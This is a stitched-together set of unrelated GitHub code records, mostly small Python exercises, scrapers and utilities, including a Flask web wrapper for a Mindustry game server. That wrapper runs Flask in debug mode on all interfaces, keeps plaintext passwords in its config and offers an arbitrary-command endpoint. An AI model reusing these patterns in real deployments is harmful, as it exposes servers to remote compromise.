(sprite_dir)\n\nos.mkdir(sprite_dir)\nnew_im.save(sprite_filepath)\n\nprint(\"Done, sprite stored at %s\" % (sprite_filepath))\n","repo_name":"selvan/sprite_gen","sub_path":"gen_sprite.py","file_name":"gen_sprite.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9125016165","text":"'''\nGuided Backpropogation\n'''\n\n# Imports\nfrom Model import *\n\n# Main Functions\n# Test Model and print test loss and accuracy on a input model @ Karthikeyan S CS21M028\ndef TestModel_RunTest(MODEL, X_shape=(227, 227, 3), Y_shape=10):\n '''\n Test the model and display loss and accuracy\n '''\n DATASET_PATH_INATURALIST_TEST = os.path.join(DATASET_PATH_INATURALIST, \"val\")\n # Load Test Dataset\n DATASET_TEST = LoadTestDataset_INaturalist(\n DATASET_PATH_INATURALIST_TEST, \n img_size=tuple(X_shape[:2]), batch_size=128, \n shuffle=True\n )\n # Test Model\n loss_test, eval_test = Model_Test(MODEL, DATASET_TEST)\n print(\"MODEL TEST:\")\n print(\"Loss:\", loss_test)\n print(\"Accuracy:\", eval_test)\n\n# Run\n# Params\n\n# Params\n\n# Run","repo_name":"KausikN/MTech_DL_Assignments","sub_path":"Assignment_2/TestModel.py","file_name":"TestModel.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"8767377973","text":"import urllib.request\nimport urllib.parse\nimport sys\n\nif len(sys.argv) != 3:\n print(\"Usage: python script.py \")\n sys.exit(1)\n\nurl = sys.argv[1]\nemail = sys.argv[2]\n\n# Prepare data to be sent in the POST request\ndata = urllib.parse.urlencode({'email': email}).encode('utf-8')\n\ntry:\n # Send POST request\n with urllib.request.urlopen(url, data) as response:\n content = response.read().decode('utf-8')\n print(\"Body response:\")\n print(\"\\t- type:\", type(content))\n print(\"\\t- content:\", content)\n\nexcept urllib.error.HTTPError as e:\n print(\"HTTP Error:\", e)\nexcept urllib.error.URLError as e:\n print(\"URL Error:\", e)\n\n","repo_name":"YASSINEBOUTAYEB1/alx-higher_level_programming","sub_path":"0x11-python-network_1/2-post_email.py","file_name":"2-post_email.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34063893251","text":"import heapq\nimport sys\n\nsys.stdin = open(\"D:\\code\\ps-practice\\input.txt\", \"r\")\n\nn = int(input())\nlecture = []\nfor _ in range(n):\n lecture.append(list(map(int, input().split())))\n\nlecture.sort(key=lambda x: (-x[1]))\nmax_p_heap = []\ntoday = 0\nanswer = 0\nfor i in range(n):\n p, d = lecture[i] # p(비용), d(날짜)\n if d != today:\n for _ in range(today - d - 1): # 20일 -> 18일 일 때 19일도 고려해야함\n if max_p_heap:\n n_p = -heapq.heappop(max_p_heap)\n answer += n_p\n else:\n break\n heapq.heappush(max_p_heap, -p)\n if i == n-1 or lecture[i+1][1] != d:\n n_p = -heapq.heappop(max_p_heap)\n answer += n_p\n elif d == today:\n heapq.heappush(max_p_heap, -p)\n if i == n-1 or lecture[i+1][1] != d:\n n_p = -heapq.heappop(max_p_heap)\n answer += n_p\n today = d\n# 현재 날짜가 1이 아닌 경우 힙큐에 들어있는 강연을 첫째날이 될때까지 하나씩 할 수 있음\nwhile today > 1:\n today -= 1\n if not max_p_heap:\n break\n n_p = -heapq.heappop(max_p_heap)\n answer += 
n_p\n\nprint(answer)\n","repo_name":"gaeunpark924/algorithm-study-python","sub_path":"2022/11월4주차/순회강연.py","file_name":"순회강연.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2838219922","text":"import random\r\n\r\nweapons = [1, 2, 3]\r\nplayer = False\r\n\r\n\r\nwhile not player:\r\n\r\n    # pick the computer's weapon fresh each round\r\n    comp_action = random.randint(0, 2)\r\n\r\n    player_action = int(input(\"\\nEnter your weapon ([1]rock, [2]paper, [3]scissors): \"))\r\n\r\n    if player_action == weapons[0]:\r\n        player_action = \"rock\"\r\n    elif player_action == weapons[1]:\r\n        player_action = \"paper\"\r\n    elif player_action == weapons[2]:\r\n        player_action = \"scissors\"\r\n    else:\r\n        print(\"No match! Choose correct weapon.\")\r\n        continue\r\n\r\n    if comp_action == 0:\r\n        comp_action = \"rock\"\r\n    elif comp_action == 1:\r\n        comp_action = \"paper\"\r\n    elif comp_action == 2:\r\n        comp_action = \"scissors\"\r\n\r\n    print(f\"\\nYou chose {player_action}, computer chose {comp_action}.\\n\")\r\n\r\n    if player_action == comp_action:\r\n        print(f\"Both players selected {player_action}. It's a tie!\")\r\n    elif player_action == \"rock\":\r\n        if comp_action == \"scissors\":\r\n            print(\"Rock smashes scissors! You win!\")\r\n        else:\r\n            print(\"Paper covers rock! You lose.\")\r\n    elif player_action == \"paper\":\r\n        if comp_action == \"rock\":\r\n            print(\"Paper covers rock! You win!\")\r\n        else:\r\n            print(\"Scissors cuts paper! You lose.\")\r\n    elif player_action == \"scissors\":\r\n        if comp_action == \"paper\":\r\n            print(\"Scissors cuts paper! You win!\")\r\n        else:\r\n            print(\"Rock smashes scissors! You lose.\")\r\n\r\n    new_game = input(\"\\nDo you want another game? (y/n): \")\r\n    if new_game == \"y\":\r\n        player = False\r\n    else:\r\n        print(\"Thank you!\")\r\n        break","repo_name":"noliverh/CLMITS_ACITIVITIES","sub_path":"jack_n_poy.py","file_name":"jack_n_poy.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13958408165","text":"import flask\nfrom flask import render_template, abort, redirect, request, make_response, send_file, g, session, flash\nimport os, socket, subprocess, time, re\n\n# START CONFIG HERE\n\n# Path to the mindustry server jar file\njar_path=\"/path/to/server-release.jar\"\n\n# Path to java\njava_path=\"/usr/bin/java\"\n\n# Display name of the server\nserverName = \"Mindustry Server\"\n# Description for the server\ndesc=\"A private server for friends.\"\n\n# Memory limit when running server. Useful for limited available memory\nmemoryLimit=\"-Xmx200M\"\n\n# Maximum amount of saved server interactions\nmaxConvoLen=20\n\n# User accounts on the server\naccounts = {\n \"admin\": { # username\n \"password\": \"PASSWORD_CHANGE_ME_PLEASE\", # Password for the account\n # Commands the account can run\n \"allowedCommands\": [\"pause\", \"host\", \"stop\", \"load\", \"save\", \"whitelist\", \"reloadmaps\", \"gameover\", \"status\"],\n # Save slots the account is allowed to use\n \"allowedSlots\": [\"slot0\", \"slot1\", \"slot2\", \"admin slot\"],\n # Whether the account is allowed to run arbitrary mindustry commands.\n # It is strongly recommended to not enable this UNLESS you:\n # 1. Trust this server code to be secure\n # 2. Trust the mindustry source code to be secure\n # 3. 
Trust this user\n # Otherwise, they may be able to arbitrarily execute commands and potentially compromise the server\n \"allowArbitraryCommands\": False,\n # If the user is allowed to see the full saved history of server interactions, up to the maxConvoLen\n \"seeFullHistory\": True,\n },\n \"trustedInvitee\": {\n \"password\": \"PASSWORD_CHANGE_ME_PLEASE\",\n \"allowedCommands\": [\"pause\", \"host\", \"stop\", \"load\", \"save\", \"whitelist\"],\n \"allowedSlots\": [\"slot0\", \"slot1\", \"slot2\"],\n \"allowArbitraryCommands\": False,\n \"seeFullHistory\": False,\n },\n \"untrustedInvitee\": {\n \"password\": \"PASSWORD_CHANGE_ME_PLEASE\",\n \"allowedCommands\": [\"pause\", \"host\", \"stop\", \"load\",],\n \"allowedSlots\": [\"slot0\"],\n \"allowArbitraryCommands\": False,\n \"seeFullHistory\": False,\n },\n}\nsecret_key=\"CHANGEMETOO\"\n# END CONFIG HERE\n\nif jar_path == \"/path/to/server-release.jar\":\n print(\"Open the server.py file to edit the configuration.\")\n exit()\n\nmindustrySocket = None\napp = flask.Flask(__name__, static_folder='assets')\napp.secret_key = secret_key\nport = int(os.getenv('PORT', 8090))\nlogHead=r\"\\[\\d\\d\\-\\d\\d\\-\\d\\d\\d\\d \\d\\d:\\d\\d:\\d\\d\\] \\[I\\]\\ \"\nconversation=[]\nconversationPointer=-1\nmaps=[]\n\ndef inputCommand(command, byUser=True):\n global conversationPointer\n mindustrySocket.sendall(command.encode()+b'\\n')\n if byUser:\n conversationPointer += 1\n return getOutput()\n\ndef getOutput():\n global conversation, conversationPointer\n newExchange = b\"\"\n while True:\n try:\n newExchange += mindustrySocket.recv(1)\n except socket.timeout:\n break\n newExchange = re.sub(r'\\x1b\\[\\d+m','',newExchange.decode())\n newExchange = newExchange\n if newExchange != \"\":\n conversationPointer -= 1\n if len(conversation) <= maxConvoLen:\n conversation.append(newExchange)\n else:\n conversation.pop(0)\n conversation.append(newExchange)\n else:\n conversationPointer -= 1\n if len(conversation) <= maxConvoLen:\n conversation.append(\"Server timed out\")\n else:\n conversation.pop(0)\n conversation.append(\"Server timed out\")\n return newExchange\n\n\ndef reloadMaps():\n global maps\n inputCommand('reloadmaps')\n mapsCommandOutput = inputCommand(\"maps all\")\n matches = re.findall(r\"(\\ *)?\\(?([A-Za-z_0-9\\ ]*)(\\.msav)?\\)?:\\ (Default|Custom) \\/ \\d+x\\d+\", mapsCommandOutput)\n maps = []\n for match in matches:\n maps.append(f\"{match[1]}\")\n\n@app.before_first_request\ndef init():\n global mindustrySocket, maps\n child = subprocess.Popen([java_path, memoryLimit, \"-jar\", jar_path], stdin=subprocess.PIPE, \n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n child.stdin.write(f'config name {serverName}\\n'.encode())\n child.stdin.write(f'config description {desc}\\n'.encode())\n child.stdin.write(b'config whitelist true\\n')\n time.sleep(10)\n mindustrySocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n mindustrySocket.connect( (\"localhost\", 6859) )\n mindustrySocket.settimeout(5.0)\n\n reloadMaps()\n\n@app.route('/', methods=['GET'])\ndef home():\n username = session.get(\"username\")\n if username is None or username not in accounts.keys():\n return render_template(\"login.html\")\n return render_template(\"home.html\", maps=maps, conversation=conversation, conversationPointer=conversationPointer, accountInfo=accounts[username])\n\n@app.route('/', methods=['POST'])\ndef login():\n usernameIn = request.form.get('username')\n passwordIn = request.form.get('password')\n if usernameIn in accounts.keys() and 
accounts[usernameIn][\"password\"] == passwordIn:\n session[\"username\"]=usernameIn\n return render_template(\"home.html\", maps=maps, conversation=conversation, conversationPointer=conversationPointer, accountInfo=accounts[usernameIn])\n else:\n return render_template(\"login.html\")\n\ndef testLoggedIn():\n username = session.get(\"username\")\n if username is None:\n abort(403)\n\ndef testCanRun(command):\n username = session.get(\"username\")\n testLoggedIn()\n if command not in accounts[username][\"allowedCommands\"]:\n abort(403)\n\n@app.route('/actions/runCommand', methods=['POST'])\ndef runCommand():\n command = request.form.get('command')\n username = session.get(\"username\")\n testLoggedIn()\n if not accounts[username][\"allowArbitraryCommands\"]:\n abort(403)\n inputCommand(command)\n return redirect(\"/\")\n\n@app.route('/actions/pause-on', methods=['GET'])\ndef pauseStateOn():\n testCanRun(\"pause\")\n inputCommand('pause on')\n return redirect(\"/\")\n\n@app.route('/actions/pause-off', methods=['GET'])\ndef pauseStateOff():\n testCanRun(\"pause\")\n inputCommand('pause off')\n return redirect(\"/\")\n\n@app.route('/actions/save-to-slot/', methods=['GET'])\ndef saveToSlot(save_slot):\n testCanRun(\"save\")\n username = session.get(\"username\")\n if save_slot in accounts[username][\"allowedSlots\"]:\n inputCommand(f'save {save_slot}')\n return redirect(\"/\")\n\n@app.route('/actions/load-slot/', methods=['GET'])\ndef loadSlot(save_slot):\n testCanRun(\"load\")\n username = session.get(\"username\")\n if save_slot in accounts[username][\"allowedSlots\"]:\n inputCommand(f'load {save_slot}')\n return redirect(\"/\")\n\n@app.route('/actions/stop', methods=['GET'])\ndef stopGame():\n testCanRun(\"stop\")\n inputCommand(f'stop')\n return redirect(\"/\")\n\n@app.route('/actions/host', methods=['GET'])\ndef hostGame():\n testCanRun(\"host\")\n inputCommand(f'host')\n return redirect(\"/\")\n\n@app.route('/actions/host', methods=['POST'])\ndef hostGameDefined():\n testCanRun(\"host\")\n map=request.form.get('map')\n mode=request.form.get('mode')\n if map not in maps:\n abort(400)\n if mode not in [\"sandbox\", \"survival\", \"attack\", \"pvp\"]:\n abort(400)\n inputCommand(f'host {map} {mode}')\n return redirect(\"/\")\n\n@app.route('/actions/disableWhitelist', methods=['GET'])\ndef letInPlayer():\n testCanRun(\"whitelist\")\n inputCommand(\"config whitelist off\")\n return redirect(\"/\")\n\n@app.route('/actions/enableWhitelist', methods=['GET'])\ndef keepOut():\n testCanRun(\"whitelist\")\n inputCommand(\"config whitelist on\")\n return redirect(\"/\")\n\n@app.route('/actions/whitelistRecentPlayer', methods=['GET'])\ndef tempWhitelistOff():\n testCanRun(\"whitelist\")\n global conversationPointer\n recentActivity = getOutput()\n matches = re.findall(r\"([A-Za-z=\\d]{24})\", recentActivity)\n if len(matches) >= 1:\n inputCommand(f\"whitelist-add {matches[-1]}\")\n else:\n conversation.append(\"No players joining recently\")\n return redirect(\"/\")\n\n@app.route('/actions/reloadmaps', methods=['GET'])\ndef reloadMapsEndpoint():\n global maps\n testCanRun(\"reloadmaps\")\n reloadMaps()\n return redirect(\"/\")\n\n@app.route('/actions/gameover', methods=['GET'])\ndef gameover():\n testCanRun(\"gameover\")\n inputCommand('gameover')\n return redirect(\"/\")\n\n@app.route('/actions/status', methods=['GET'])\ndef status():\n testCanRun(\"status\")\n inputCommand('status')\n return redirect(\"/\")\n\n@app.route('/status', methods=['GET'])\ndef debug():\n inputCommand(\"status\")\n return 
redirect(\"/\")\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=port, debug=True)","repo_name":"LivelyCarpet87/Mindustry-HTTP-Wrapper","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":8705,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"36603788652","text":"import re\r\ns, m = input(), input()\r\nans = 0\r\nif s.isdigit():\r\n ans += 1\r\nif re.findall('[sS][pP][aA][mM]', m) and sum(list(map(lambda x: len(x), re.split('[\\w\\s]*', m)))) > len(m) // 2:\r\n ans += 2\r\nif ans == 0:\r\n print('Not Spam')\r\nelif ans == 1:\r\n print('Invalid Sender')\r\nelif ans == 2:\r\n print('Invalid Content')\r\nelse:\r\n print('Fully Invalid')","repo_name":"mohsendb7008/Online-Judge-Solutions","sub_path":"Quera/Spam.py","file_name":"Spam.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"29589589437","text":"import time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.common.keys import Keys\r\n\r\ndriver = webdriver.ChromiumEdge()\r\ndriver.get(\"https://www.novaliderinformatica.com.br/computadores\")\r\ntime.sleep(3)\r\ntitulos = driver.find_elements(By.XPATH, \"//a[@class='nome-produto']\")\r\nprecos = driver.find_elements(By.XPATH, \"//strong[@class='preco-promocional']\")\r\nprodutos=[]\r\nprecosArray=[]\r\nfor titulo in titulos:\r\n produtos.append(titulo.text)\r\n\r\nfor preco in precos:\r\n precosArray.append(preco.text)\r\n\r\nfor i in range(1,len(precosArray)):\r\n print(produtos[i]+'\\n'+precosArray[i])\r\n\r\n\r\n","repo_name":"LucasMasaoK/Web-Scraping-Selenium","sub_path":"Selenium.py","file_name":"Selenium.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31865668378","text":"import numpy\nimport os\nfrom PIL import Image\nfrom torch.utils.data import Dataset\nimport torch\n\n\nclass city_scapes(Dataset):\n def __init__(self, datapath, transform):\n self.dir_path = datapath\n self.image_path = self.dir_path\n print(self.image_path)\n self.filtered_images, self.filtered_filenames = self.get_filtered_data()\n self.labels = self.get_labels(self.filtered_filenames)\n self.transform = transform\n\n def __getitem__(self, idx):\n if torch.is_tensor(idx):\n idx = idx.tolist()\n self.samples = {'image': self.filtered_images[idx], 'label': self.labels[idx]}\n if self.transform:\n self.samples['image'] = self.transform(self.samples['image'])\n return self.samples\n\n def __len__(self):\n return len(self.filtered_images)\n\n\n def image_dims(self, image):\n\n \"\"\"Checks if image contains more pixels than specified threshold\n :param image: input image\n :return: True if number of pixels inside image is larger then size_threshold, false otherwise\n \"\"\"\n #####Insert your code here for subtask 1b#####\n width, height = image.size\n return width * height >= 900\n\n def get_labels(self, filename):\n labels = []\n _MAP_CS_TO_TR_LABEL = {24: 0, 25: 1, 26: 2}\n for name in filename:\n id_ = int(name[-9:-4]) # Get last part of filename which reveals label of image\n base_id = id_ if (id_ < 1000) else id_ // 1000\n labels.append(_MAP_CS_TO_TR_LABEL[base_id])\n return labels\n\n def get_filtered_data(self):\n images = []\n file_names = []\n print(\"fetching data from the data directory\")\n\n for filename in 
os.listdir(self.image_path):\n img = Image.open(os.path.join(self.image_path, filename)).convert('RGB')\n if img is not None:\n if self.image_dims(img):\n images.append(img)\n file_names.append(filename)\n\n print('Number of Images', len(images))\n print('Number of file names', len(file_names))\n return images, file_names\n","repo_name":"NurAd-Din/ML-WS22","sub_path":"Exercise 05/q1_cnn_pytorch/cs_dataset.py","file_name":"cs_dataset.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71990672439","text":"# 默认参数时可变的数据类型时, 有陷阱。\n # 如果默认参数指向的是可变的数据类型,那么无论调用多少次这个默认参数,这个数据对象指向的都是同一个内存对象。\n'''\ndef func(name,alist=[]):\n alist.append(name)\n return alist\n\nret1 = func('abc')\nprint(ret1) # ['abc']\nret2 = func('bcd')\nprint(ret2) # 按理说,重复执行函数,默认参数为alist=[] ,结果应该只是['bcd'],实际上并不是\n # 因为这两个结果是一个list对象(id相等),结果为['abc','bcd']\n'''\n# 所以想调用一个新的列表,那就要指定参数,而不是使用默认参数的列表对象。\ndef func(name,alist=[]):\n alist.append(name)\n return alist\n\nret1 = func('abc')\nprint(ret1) # ['abc']\nret2 = func('bcd')\nprint(ret2) \nret3 = func('def',[]) # 指定参数,而不是默认参数。\nprint(ret3) \n#['abc']\n#['abc', 'bcd']\n#['def']\n\n\n\n\n\n# 局部作用域的坑\n'''\n# 本该调用全局作用域的变量��,但是py解释器认为局部作用域中声明的变量写在后面了,因此报错。\n# 因此,应该在使用前先定义。\n\ncount = 1\ndef func():\n print(count) # 查询全局作用域的count值\n count = 2 # 声明局部作用域的count值\n print(count) # 输出局部作用域的count值\n\nfunc() # UnboundLocalError: local variable 'count' referenced before assignment\n\n'''\n\n\n# global\n# global关键字用来在函数或其他局部作用域中使用全局变量。\n# 1. 在局部作用域中声明一个全局变量。\n'''\ndef func():\n global name\n name = 'kk'\n print(name)\n\nfunc()\nprint(name) # 在全局作用域中输出了局部作用域中声明的全局变量。\n'''\n\n# 2.修改一个全局变量\n'''\ncount = 1\ndef func():\n # print(count)\n # count += 1 # 会报错。\n global count\n print(count)\n count += 1\n print(count)\n\n'''\n\n# nonlocal\n# nonlocal声明的变量不是局部变量,也不是全局变量,而是外部嵌套函数内的变量。\n# 1.不能够操作全局变量\n'''\ncount = 1\ndef func():\n nonlocal count # 不能操作全局变量。\n count += 1\n'''\n\n# 2.局部作用域:内层函数对外层函数的局部变量进行修改\n'''\ncount = 2\ndef func():\n count = 1\n def inner():\n count += 1 # 正常是不可以的。 \n inner()\n\nfunc()\n\n\n# 但是换一种方式 用nonlocal实现\ncount = 33\ndef func():\n count = 1\n def inner():\n nonlocal count # nonlocal指定后,就可以修改引用的(上一层)的变量了。 但不适用于全局变量,只适用于“E”级别的。\n count += 1\n print(count)\n inner()\n print(count)\nfunc()\n# 结果是: 2 \\n 2\n'''\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"jolleykong/kk_life","sub_path":"Python/pystudy/day10/10 的补充.py","file_name":"10 的补充.py","file_ext":"py","file_size_in_byte":2783,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"32042334129","text":"import Iindex\nimport json\nimport os\nimport random\nimport string\n\n\ndef writeInvertedIndex(data):\n with open(\"InvertedIndex.json\", \"w\") as write_file:\n json.dump(fromClassToDic(data), write_file, indent=4)\n\n\ndef writeInvertedIndexPositional(data):\n with open(\"InvertedIndexPositional.json\", \"w\") as write_file:\n json.dump(fromClassToDic(data), write_file, indent=4)\n\n\ndef readInvertedIndex(file): # returns list of dic\n if os.stat(file).st_size != 0:\n with open(file, \"r\") as file:\n data = json.load(file)\n data = sorted(data, key=lambda index: index['_Iindex__word'])\n return fromDicToClass(data)\n else:\n index = {}\n print(\"Inverted index is empty \")\n return index\n\n\ndef readInvertedIndexPositional(file): # returns list of dic\n if os.stat(file).st_size != 0:\n with open(file, \"r\") as file:\n data = json.load(file)\n data = sorted(data, 
key=lambda indexPos: indexPos['_PositionalIndex__word'])\n return fromDicToClassPositional(data)\n else:\n index = {}\n print(\"Positional Inverted index is empty \")\n return index\n\n\n# convert from dict to class\ndef fromDicToClass(dataset):\n dicIndex = {}\n for data in dataset:\n x = Iindex.Iindex(data[\"_Iindex__word\"], data[\"_Iindex__frequency\"],\n list(map(lambda x: x, data[\"_Iindex__postingList\"])))\n c = dicIndex[x.getWord()] = x\n return dicIndex\n\n\ndef fromDicToClassPositional(dataset):\n dicIndex = {}\n for data in dataset:\n x = Iindex.PositionalIndex(data[\"_PositionalIndex__word\"], data[\"_PositionalIndex__postingList\"])\n c = dicIndex[x.getWord()] = x\n return dicIndex\n\n\n# convert from class to dict\ndef fromClassToDic(dataset):\n return list(map(lambda x: vars(x), dataset.values()))\n\n\n# from docId to file name\ndef changeDocIdToFileName(id, DocIds):\n if id in DocIds:\n return DocIds[id]\n else:\n return \"\"\n\n\n# generate docId\ndef getDocId(length):\n letters = string.ascii_letters\n result_str = ''.join(random.choice(letters) for i in range(length))\n return result_str\n\n\ndef writeDocId(data):\n with open(\"DocId.json\", \"w\") as write_file:\n json.dump(data, write_file, indent=4)\n\n\ndef writeDocIdPositional(data):\n with open(\"DocIdPositional.json\", \"w\") as write_file:\n json.dump(data, write_file, indent=4)\n\n\ndef readDocId():\n if os.stat(\"DocId.json\").st_size != 0:\n with open(\"DocId.json\", \"r\") as read_file:\n data = json.load(read_file)\n return data\n else:\n dic = {}\n return dic\n\n\ndef readDocIdPositional():\n if os.stat(\"DocIdPositional.json\").st_size != 0:\n with open(\"DocIdPositional.json\", \"r\") as read_file:\n data = json.load(read_file)\n return data\n else:\n dic = {}\n return dic\n","repo_name":"shuramishfuh/Inf_retrieval","sub_path":"Inf_retrieval/JsonSer.py","file_name":"JsonSer.py","file_ext":"py","file_size_in_byte":2906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4220952642","text":"import socket\nimport select\nimport datetime\n\n\nIP = \"192.168.1.65\"\nEnglish = [\"x\", \"January\", \"February\", \"March\", \"April\", \"May\", \"June\",\n \"July\", \"August\", \"September\", \"October\", \"November\", \"December\"]\n\nMaori = [\"x\", \"Kohitatea\", \"Hui-tanguru\", \"Poutu-te-rangi\", \"Paenga-whawha\",\n \"Haratua\", \"Pipiri\", \"Hongongoi\", \"Here-turi-koka\", \"Mahuru\", \n \"Whiringa-a-nuku\", \"Whiringa-a-rangi\", \"Hakihea\"]\n\nGerman = [\"x\", \"Januar\", \"Februar\", \"Marz\", \"April\", \"Mai\", \"Juni\", \"Juli\",\n \"August\", \"September\", \"Oktober\", \"November\", \"Dezember\"]\n\nLists = [English, Maori, German]\n\nLanguage_Strings = [\"English\", \"Maori\", \"German\"]\n\n\ndef main(portE, portM, portG):\n try:\n english_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n english_socket.bind((IP, portE))\n maori_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n maori_socket.bind((IP, portM))\n german_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n german_socket.bind((IP, portG))\n sockets = [english_socket, maori_socket, german_socket]\n except:\n print(\"Failed to set up socket connection\")\n return 0\n\n while True:\n requests, _, _ = select.select(sockets, [], [])\n count = 0\n for request in requests:\n try:\n data, client_address = request.recvfrom(1024)\n print(\"Request received from {}:{}\".format(client_address[0], \n client_address[1]))\n lan_str = Language_Strings[sockets.index(request)]\n except:\n print(\"Error accepting request\")\n return 0\n \n if check_data(data) == 1:\n date = datetime.datetime.now()\n request_type = join2b(data[4], data[5])\n text, lan_num = make_txt(request_type, date, lan_str)\n DT_res = dt_response(request_type, lan_num, date, text)\n try:\n sockets[lan_num-1].sendto(DT_res, client_address)\n print(\"Response sent to {}:{}\".format(client_address[0], \n client_address[1]))\n except:\n print(\"Error sending response to {}:{}\".format(client_address[0],\n client_address[1]))\n english_socket.close()\n maori_socket.close()\n german_socket.close()\n\n\ndef check_data(data):\n \"\"\"Checks a DT_request packet for errors, returns 1 if there aren't any\"\"\"\n if len(data) != 6:\n print('error: Message Length Incorrect')\n return -1\n \n magic_no = join2b(data[0], data[1])\n if magic_no != 0x497E:\n print('error: Magic Number Incorrect')\n return -2\n \n packet_type = join2b(data[2], data[3])\n if packet_type != 0x0001:\n print('error: Packet Type not recognised')\n return -3\n \n request_type = join2b(data[4], data[5])\n if (request_type != 0x0001) and (request_type != 0x0002):\n print('error: Request Type not recognised')\n return -4\n \n else:\n return 1\n \n \n \ndef join2b(a, b):\n \"\"\"Combines 2 bytes\"\"\"\n x = a << 8 | b\n return x\n\n\ndef make_txt(request_type, date, lan_str):\n \"\"\"Returns a string containing the date or time in the requested language\"\"\"\n if request_type == 1:\n if lan_str == 'English':\n text = \"Today's date is {:0>2} {:0>2}, {:0>4}\".format(Lists[0][date.month], \n date.day, date.year)\n lan_num = 0x01\n elif lan_str == 'Maori':\n text = \"Ko te ra o tenei ra ko {:0>2} {:0>2}, {:0>4}\".format(Lists[1][date.month], \n date.day, date.year)\n lan_num = 0x02\n else:\n text = \"Heute ist der {:0>2}. 
{:0>2} {:0>4}\".format(date.day, Lists[2][date.month],\n date.year)\n lan_num = 0x03\n \n else: #request_type == 2\n if lan_str == 'English':\n text = \"The current time is {:0>2}:{:0>2}\".format(date.hour, date.minute)\n lan_num = 0x01\n elif lan_str == 'Maori':\n text = \"Ko te wa o tenei wa {:0>2}:{:0>2}\".format(date.hour, date.minute)\n lan_num = 0x02\n else:\n text = \"Die Uhrzeit ist {:0>2}:{:0>2}\".format(date.hour, date.minute)\n lan_num = 0x03\n \n return text, lan_num\n \n \ndef dt_response(r_type, lan_num, date, text):\n \"\"\"composes dt_response packet\"\"\"\n x = text.encode('utf-8')\n res = bytearray(13 + len(x)) \n res[0] = 0x49 \n res[1] = 0x7E\n res[2] = 0x00\n res[3] = 0x02\n res[4] = 0x00\n res[5] = lan_num\n year = date.year.to_bytes(2, 'big')\n res[6] = year[0]\n res[7] = year[1]\n res[8] = date.month\n res[9] = date.day\n res[10] = date.hour\n res[11] = date.minute\n res[12] = len(x)\n count = 13\n for byte in x:\n res[count] = byte\n count += 1\n return res\n\nmain(5001,5002,5003)","repo_name":"obn11/COSC","sub_path":"COSC264/Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":5162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38042295651","text":"# Answer: 119551\r\n\r\nimport re\r\n\r\nfile = open (\"03.txt\")\r\n\r\n# Convert raw data\r\ndata = []\r\nxMax = 0\r\nyMax = 0\r\n\r\nfor line in file:\r\n l = int (re.search (\"\\d+(?=,)\" , line).group ())\r\n t = int (re.search (\"(?<=,)\\d+\", line).group ())\r\n w = int (re.search (\"\\d+(?=x)\" , line).group ())\r\n h = int (re.search (\"(?<=x)\\d+\", line).group ())\r\n if l + w > xMax:\r\n xMax = l + w\r\n if t + h > yMax:\r\n yMax = t + h\r\n data.append ((l, t, w, h))\r\n\r\n# Create sheet matrix\r\nsheet = []\r\nfor x in range (xMax):\r\n column = []\r\n for y in range (yMax):\r\n column.append (0)\r\n sheet.append (column)\r\n\r\n# Count overlapping squares\r\noverlaps = 0\r\nfor line in data:\r\n for x in range (line[0], line[0] + line[2]):\r\n for y in range (line[1], line[1] + line[3]):\r\n sheet[x][y] += 1\r\n if sheet[x][y] == 2:\r\n overlaps += 1\r\n\r\nprint (overlaps)\r\nfile.close ()\r\n","repo_name":"distributive/Advent-of-Code-2018","sub_path":"03a.py","file_name":"03a.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"30755198630","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"pubmed_twitter_bot.py : a twitter bot searching for the latest articles\non a given subjet on PubMed and publishing on twitter.\"\"\"\n\n__author__ = \"Maxime Borry\"\n__license__ = \"BEERWARE\"\n\nimport time\nimport datetime\nimport argparse\n\n\ndef _get_args():\n '''This function parses and return arguments passed in'''\n parser = argparse.ArgumentParser(\n prog='pubtwitmed',\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description=f'''\n==========================================================\nPubTwitMed\nA twitter bot publishing regularly all recent scientific\narticles from PubMed related to a given subject.\nAuthor: Maxime Borry\nContact: \nHomepage & Documentation: github.com/maxibor/PubTwitMed\n==========================================================\n ''')\n parser.add_argument(\n '-doi',\n dest=\"doi_db\",\n default=\"./doi_db.txt\",\n help=\"Path to DOI database file /path/to/doi_db.txt\")\n parser.add_argument(\n '-artmax',\n 